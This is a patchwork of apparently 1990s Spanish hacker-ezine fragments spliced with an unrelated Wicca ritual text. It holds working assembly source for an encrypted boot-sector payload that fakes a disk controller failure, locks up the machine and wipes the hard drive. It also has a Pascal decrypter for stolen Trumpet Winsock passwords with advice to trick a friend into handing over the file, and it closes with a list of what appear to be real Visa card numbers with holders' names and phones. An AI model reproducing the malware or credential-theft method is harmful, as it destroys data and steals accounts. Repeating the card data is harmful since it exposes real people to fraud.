        mov     cx, OFFSET bootProgramEnd - OFFSET start
        mov     ax, 8000h
        mov     es, ax
        mov     di, 0

decryptNextByte:
        lodsb
        xor     al, '*'
        stosb
        loop decryptNextByte
        DB 0EAh, 00h, 00h, 00h, 080h

start:
        mov     ax, 09000h
        mov     ds, ax
        mov     di, 0
        mov     ax, 0
        mov     bx, 0
        mov     cl, 1
        mov     ch, 1
        mov     si, READ
        call hdRW        ;lee nuestro boot sector
        mov     bx, 400
        cmp BYTE PTR [bx], 0 ; nuestro contador llego a 0?
        je errMessage        ; si? mostrar msg de error
        dec BYTE PTR [bx]
        mov     di, 0
        mov     ax, 0
        mov     bx, 0
        mov     cl, 1
        mov     ch, 1
        mov     si, WRITE
        call hdRW
        mov     bx, 400
        cmp BYTE PTR[bx], 0
        je wipeDrive    ;llegamos a 0? lo hacemos mierda...
        xor     ax, ax
        mov     ds, ax
        mov     ax, 07C00h
        mov     di, ax
        mov     ax, 0
        mov     bx, 0
        mov     cl, 7
        mov     ch, 1
        mov     si, READ
        call hdRW
        DB 0EAh, 00h, 07Ch, 00h, 00h

errMessage:
        mov     cx, 26
        mov     si, OFFSET errText - OFFSET start
        mov     ax, cs
        mov     ds, ax

outLoop:
        mov     ah, 0Eh
        mov     al, [si]
        inc     si
        mov     bx, 0007h
        int 10h
        loop outLoop
        mov     dx, HDDCMD or STEALTH   ;calla al HD
        mov     al, SLEEP
        out     dx, al

lockup:
        jmp short lockup    ;trava el sistema

wipeDrive:
        mov     ah, 08h
        mov     dl, 080h
        int 13h
        inc     dh
        mov     MAXHEADS, dh
        and     cl, 01Fh
        inc     cl
        mov     MAXSECTS, cl
        mov     bx, 0     ; bx=cilindro
        mov     cx, 0101h
        mov     ax, 0100h

nextSect:
        mov     di, 2600h
        mov     si, WRITE
        push    ax
        push    cx
        push    bx
        call hdRW
        cli
        pop     bx
        pop     cx
        pop     ax
        inc     ah
        cmp     ah, MAXHEADS
        jne     nextSect
        mov     ah, 0
        inc     cl
        cmp     cl, MAXSECTS
        jne     nextSect
        mov     cl, 0
        inc     bx
        jmp short nextsect

errText:
        DB 0Ah, 'HDD 0 controller failure',07h

MAXHEADS DB (?)
MAXSECTS DB (?)

;hdwait  espera que el hd y la controladora terminen lo que estan haciendo
hdWait Proc Near
        push dx
        push ax

hdWaitLp:
        mov     dx, HDSTATUS or STEALTH
        in      al, dx
        mov     ah, al
        and     ah, 050h
        cmp     ah, 050h
        jne short hdWaitLp
        and     al, 080h
        cmp     al, 080h
        je short hdWaitLp
        pop     ax
        pop     dx
        ret
hdWait endp

;hdRW  lee un bloque de datos desde o a el HD (gracias a Commander Crash
;por esta rutina)   DI buffer,  AL drive,  AH head,  BX cilinder,  CL sector
;CH nunsectors// SI read/write. atencion la rutina esta un poco tocada...

hdRW proc near
        call hdWait
        cli
        shr al, 4
        or al, ah
        or al, 0A0h
        mov dx, HDDRHEAD or STEALTH
        out dx, al
        mov dx, HDCYLLOW or STEALTH
        mov ax, bx
        out dx, ax
        mov dx, HDSECTOR or STEALTH
        mov al, cl
        out dx, al
        mov dx, HDSECTORS or STEALTH
        mov al, ch
        out dx, al
        mov dx, HDDCMD or STEALTH
        mov ax, si
        out dx, al
        call hdWait
        mov dx, HDSTATUS or STEALTH

drq:
        in      al, dx
        and     al, 08h
        cmp     al, 08h
        jne drq
        cmp     si, READ
        je readNextSector

writeNextSector:         ;escribe 256 words en 1 sector
        mov     bl, 0FFh

writeNextByte:
        mov     dx, HDDATA or STEALTH
        mov     ax, [DI]
        out     dx, ax
        add     di, 2
        dec     bl
        cmp     bl, 0FFh
        jnz short writeNextByte
        dec     ch
        jnz short writeNextSector
        jmp short exitRW

readNextSector:
        mov     bl, 0FFh

readNextByte:
        mov     dx, HDDATA or STEALTH
        in      ax, dx
        mov     [DI], ax
        add     di, 2
        dec     bl
        cmp     bl, 0FFh
        jnz short readNextByte
        dec     ch
        jnz short readNextSector

exitRW:
        sti
        ret
hdRW Endp

bootProgramEnd:
sectorData  DB  512  DUP (?)
END

----------cortar aca ---------------

..............................................................................


4- Literatura
/////////////

Sipi... porque el cyberspace es tambien cultura... asi que aca, sector libros

Cyberpunk: Outlaws and Hackers on the Computer Frontier.
Por K. Hafner y J. Markoff. editorial TOUCHSTONE isbn:0-671-68322-5

Este libro aunque paresca la clasica novela cyberpunk no lo es; este libro
habla de 3 historias reales de tres hackers muy famosos, como actuaban y como
a veces por estupides otra por mala suerte los capturaron.
La primera historia es sobre Kevin Mitnik (como dijimos arriva "el hacedor");
la historia es sobre este singular chico, experto en el phreking y mas tarde
en computadoras, que fue paso a paso destruyendo y haciendo todo tipo de
fraudes con computadoras. Al final de la historia tenia a todo el FBI detras
de el. Este mismo chico, el hacedor, es el hacker fantasma en el libro
comentado en el texto anterior, donde el autor fue tan solo uno de los afec-
tados por el.
La segunda historia es sobre un hacker que se vendio. Un hacker que empezo
a trabajar con los rusos vendiendo info en la epoca de la guerra fria, cuando
los congelados de mierda no tenian ni una puta computadora que anduviece bien.
Y la tercera y tal vez mas interesante (al menos para mi) es sobre la de RTM
(el creador dicho arriba) quien es famoso por su Internet Worm o el gusano de
la internet el cual afecto a miles de computadoras en pocos minutos. Nos
cuenta de como este muchacho, ninio privilegiado con un padre que trabajaba
en AT&T inventores de UNIX, desde muy chico fue metiendose primero con la
arpanet, luego con bitnet y sucesivamente lo que seria despues la internet.
Los autores hicieron un estupendo trabajo de investigacion sobre el tema e
inclusive tuvieron contacto con los hackers en la carcel. Esta en ingles, no
le conosco version en espaniol pero fijence.
Lean, aprendan, usen y mejoren.

.............................................................................


5- aclaraciones varias
//////////////////////

Hoy aca no ponemos nada porque no se me canta las bolas.
Feliz Anio Nuevo.


sugerencias y criticas se reciven en:

        The Infected Info
        P.O.B. 24442
        Har Hatzofim
        91242 - Jerusalem
        Israel.
Trazando el Circulo ..

Se debe trazar el circulo en el suelo con una varita o un cuchillo magico.
En primer lugar, encienda la vela del altar, y luego las otras cuatro que
estan en los bordes del circulo, en el norte, oeste, sur y este.
Hecho esto, coja el cuchillo o varita y sostengalo encima de la vela
situada en el oeste. Lentamente, mueva la varita por el aire alrededor del
circulo y siga haciendolo hasta que llegue hasta el punto de partida.
Debe hacer esto con toda seriedad, y, al mismo tiempo, tratar de visualizar
que esta trazando un circulo de fuego. Diga estas palabras: "Oh, circulo,
se una proteccion contra los malos espiritus y poderes, para que los que
estamos dentro nos veamos libres y purificados de toda influencia exterior."
Encienda ahora el incienso. si utiliza varitas, podra sostenerlas clavandolas
en un cuenco peque¤o con arena. Incluso se pueden clavar en media papa, que
actuara como pedestal. Lleve el incienso por alrededor del circulo empezando
desde el oeste y diciendo: "Te aromatizo, circulo, para que este dulce
perume atraiga solo a los buenos espiritus y aleje a las influencias
malignas." Vuelva a llevar el incienso hasta el altar y tomando la sal,
espolvoreela sobre el cuenco del agua, diciendo: "Mezclo esta criatura de sal
con esta criatura de agua, y, cuando se combine, se convertira en un liquido
purificador consagrado al dios y la diosa. Hago esto en los nombres de Hob
y Anu."
Tome el agua consagrada y rocie con ella los alrededores del circulo,
diciendo: "Purifico este circulo en los nombres de Hob y Anu." De pie ante
el altar, que estara situado en el lado norte, rociese con el agua y diga:
"Me purifico con este agua para encontrarme en estado adecuado para servir
a los dioses de nuestro antiguo arte." Aromaticese luego con incienso. Eso
se hace formando el signo del triangulo lo mas cerca posible del cuerpo,
sosteniendo con ambas manos el cuenco del incienso. Si es hombre, forme un
triangulo con la punta hacia arriba; si es mujer, el triangulo se formara
con la punta hacia abajo. Despues diga: "Me ofrezco como sacrificio a los
dioses, y os pido que acepteis este don el poder corporal de vuestro ciervo
y sacerdote (o sacerdotiza)."
Dicho esto, se corta con el athame un poco de pelo del pubis y las axilas
y se queman en la concha. (Tambien esto es simbolico, pues las dos axilas
y el area pubica de un triangulo descendente son el simbolo de la diosa.)
Coja ahora la varita, dirijase hacia el oeste y se¤ale en esa direccion.
Trae en el aire el signo del pantaculo y diga en voz alta: "Os invoco,
despierto y llamo, Poderosos del oeste para que presencieis los ritos y
defendais el circulo."
Se dirige entonces hacia el sur y repite lo mismo en los tres puntos
cardinales.
Coja ahora un agijon de dos puntos y, con la vara en la mano trace una "V"
en el aire (El signo del dios) diciendo: "Te invoco, oh temido. Para que
estes presente durante el rito y me ayudes en las artes magicas." Mire con
intensidad al aguijon hasta que pueda visualizar al propio dios de los
cuernos. Con la practica, siempre que la invocacion se haga con sinceridad,
sentira la presencia del dios.
Se coje entonces el aguijon femenino y se invoca a la diosa con su signo,
el triangulo con la punta hacia abajo: "Te invoco, oh amable diosa y madre
de todos nosotros, para que estes presente en este rito y me ayudes en
mi trabajo magico."
He descrito la invocacion de ambas deidades, pero solo se suele invocar una,
es decir, a aquella que rige en el periodo particular del a¤o en que se
realiza el rito. Desde la candelaria hasta la vispera de todos los santos es
la diosa; el resto del a¤o corresponde al dios.

                                (!) J /´ c /< (!)
 Como sabran el WINSOCK trae una opcion de AUTOLOGIN, para la cual tenemos que
 poner nuestro handle y pwrd. dato el cual es encriptado por razones OBVIAS de
 seguridad. Ahora bien, que es lo que tenemos aki?... facil: UN PROGRAMA DESEN
 CRIPTADOR de las claves. El mismo esta hecho en pascal y fue escrito por un
 colaborador de PSYCHO Magazine para esta edicion, veamos entonces...

 --- CUT HERE -----------------------------------------------------------------
{                                                                             }
{                           Decrypt.pas coded by goliat                       }
{                                                                             }

Program Trumpet_Decrypt;
Uses Crt, Dos;
Var
	a: Integer;
	Vector: Array [1..20] Of Integer;
	Aux: Integer;
	Cad: String;
	F: Text;
Begin
  Vector[1]:=40;                                        { Cargo el vector con }
  Vector[2]:=-43;                                       { numeros a sumar y/o }
  Vector[3]:=-23;                                                 { restar .. }
  Vector[4]:=-15;
  Vector[5]:=14;
	Vector[6]:=-34;
	Vector[7]:=41;
	Vector[8]:=-60;
	Vector[9]:=-3;
	Vector[10]:=-36;
	Vector[11]:=-37;
	Vector[12]:=41;
	Vector[13]:=27;
	Vector[14]:=-6;
	Vector[15]:=6;
	Vector[16]:=5;
	Vector[17]:=-13;
	Vector[18]:=11;
	Vector[19]:=54;
	Vector[20]:=-46;

  Assign(F, 'clave.trm');          { asigno a f el handle del file: clave.trm }
	{$I-}
  Reset(f);                                                    { abro el file } 
  if IoResult = 2 Then                                  { en caso de error .. }
		Begin
			Clrscr;
      WriteLn('Falta el archivo CLAVE.TRM');                { imprimo mensaje }
      WriteLn('El mismo debe contener la clave a desencriptar');
      Halt;                                         { corto el funcionamiento }
		End;
  If IoResult <> 0 Then Halt;                             { si no hay errores }
  Read(F,Cad);                            { leo la cadena (en CAD) del file F }
  For a:= 1 To Length(Cad) Do Begin          { repito como largo de cadena .. }
    Aux:=Byte(Cad[a])+Vector[a];          {sumo el valor correspondiente en el}
                                               {vector a una variable auxiliar}
    If Aux>127 Then Dec(Aux,96);               { si de mas de 127 le resto 96 }
    If Aux<32 Then Inc(Aux,96);                { si de menos de 32 le sumo 96 }
    Write(Char(Aux));                                  { imprimo el resultado }
	End;
	WriteLn;
End.
 --- CUT HERE -----------------------------------------------------------------

 ...bien... entonces ahi esta el desencriptador. ahora como conseguimos la 
 clave encriptada?.. facil.. le decimos a algun chabon que use el metodo de 
 AUTOLOGIN que te banque su winsock.ini que se te cago el tuyo y listo. 
 al final editamos el archivo para que quede SOLO la clave, lo renombramos y le
 ponemos clave.trm y listo. con solo compilarlo y ejecutarlo tendremos un lindo
 y dulce... password.

 tnx to jack for the comments.

 Hace meses atras se festejo una "bienal" joven en la "escuela" (del)O.R.T.(o)
 ... y PSYCHO Magazine estuvo ahi... lo ironico es que PSYCHO se presento por
 el solo hecho de que aparentemente habia gente un tanto "disgustada" por las
 susodichas ediciones, ete aki que luego de una ligera conversacion con los que
 estaban disgustados con la PSYCHO (un total de 2, de los cuales uno no queria
 acercarse) quedo en claro que es mucho mas peligroso dar a conocer una clave
 secreta de una cuenta bancaria que poner a disposicion de la gente recetas 
 tales como la de la bomba de hoklahoma (esta bomba, en question, fue la que
 habria ocasionado el disgusto del inquieto muchacho con la magazine), que si
 bien recordamos (o releemos la PSYCHO 2), veremos que lleva una suma 
 considerable de fertilizante como asi tambien otros elementos. Con esto quiero
 decir: NO ES MAS PELIGROSO QUE UN PENDEJO QUE NO SABE LO QUE HACE AGARRE UNA 
 CUENTA BANCARIA, Y QUE POR EL SOLO ECHO DE DECIR SOY HACKER SE INTRODUZCA EN 
 EL BANCO Y TRATE DE HACER ALGUNA TRANSACCION A UNA CUENTA QUE SEGURAMENTE NI 
 SIQUIERA SABE DE QUIEN ES, ADEMAS DE QUE POR SI, NI POR PUTA PUEDA LOGEARSE 
 PERO MIENTRAS DEL OTRO LADO ESTAN TERMINANDO DE AVERIGUAR TODOS SUS DATOS PARA
 QUE EN MENOS DE 1 A¥O EL CHABON ESTE EN CANA POR "DELITO INFORMATICO" A QUE
 EN UNA REVISTA APAREZCA UNA RECETA DE UNA BOMBA QUE PRODUCE UN EFECTO MUY PERO
 MUY PELIGROSO, CON POSIBILIDAD DE QUITARLE LA VIDA A CIENTOS DE HUMANOS, CLARO
 HAY QUE TENER EN CUENTA QUE ES MEDIANTE LA OBTENCION DE UNOS HUMMM... 200Kg DE
 FERTILIZANTE COMO PARA QUE LA BOMBA PUEDA PRODUCIR UN DA¥O CONSIDERABLE ?????
 en fin.. que da!.. pensar que salis a la calle te pisa un auto con patente 
 blanca, te hace mierda,NADIE VIO NADA y al otro lo dejan en libertad a la hora
 por ser de la creme (si es que no desaparece).
 BUENO, HASTA AKI HE LLEGADO, AHORA vayamos al punto que me trae: la seguridad
 en la O.R.T., COMO PUEDE SER TAN PESIMA?!?!?!!?! *YO* que no soy ni del barrio
 como me pude meter en la escuela por la puerta grande mientras una camara nos
 miraba al entrar ( como asi tambien al salir) y (como si fuera poco) pudimos
 introducir varias copias impresas de la PSYCHO para los amantes de la maga que
 tenemos dentro del mencionado instituto. las copias (las cuales se nos fueron
 de las manos como si fuese agua) fueron introducidas TAMBIEN por la puerta 
 grande llevadas TAL como una carpeta o cuaderno en la mano. que es lo raro?
 LO RARO ES QUE PSYCHO TIENE EL ACCESO PROHIBIDO EN LA O.R.T. YA QUE CONTIENE
 TEXTOS COMPROMETEDORES, PELIGROSOS Y ANTI-TUTTI (?????) Y BUEH.. los que la 
 calificaron asi por algo sera.. ah!.. me olvidaba de decirle GRACIAS!!!.. al 
 mr.policeman de vigilancia que se encuentra en la vereda de enfrente de la 
 escuela ya que nos a sacado una fotografia de muy buena calidad.. tnx!!! y
 siga asi... policias como ud son los que se necesitan.. digo, policias que 
 hagan algo UTIL por la comunidad y no te saquen un mango.

 Kristo.
 Fuck off.


                 VVV     VVV      IIII         SSSSSS          AAAAA
                 VVV     VVV      IIII       SSSS  SSSS      AAAAAAAAA
                 VVV     VVV      IIII       SSSS            AAA   AAA
                 VVVV   VVVV      IIII         SSSSSS        AAA   AAA
                  VVVV VVVV       IIII             SSSS      AAAAAAAAA
                    VVVVV         IIII        SS   SSSS      AAA   AAA
                     VVV          IIII         SSSSSSS       AAA   AAA
 
 ==============================================================================
 Numbas:              Titular:                         Tel:            Venc:
 ------------------------------------------------------------------------------
 4537 031 542 399     Mr.Sebastian I. Cucullu          +514-9898391    09/98
 4128 0031 8256 6987  Gustavo A. Cragnolio             702-6095        07/98
 4509 9400 0007 9363  Ruben A. Ballester               782-2839        07/96
 4508 4300 0013 9848  Carolina Perazzoli               826-2804        05/97
 4546 4310 5574 3017  Ines Fermoso                     361-1378        10/96
 4950 0001 3074 8041  Terentieff Serge                 +22-7541817     09/97
 ==============================================================================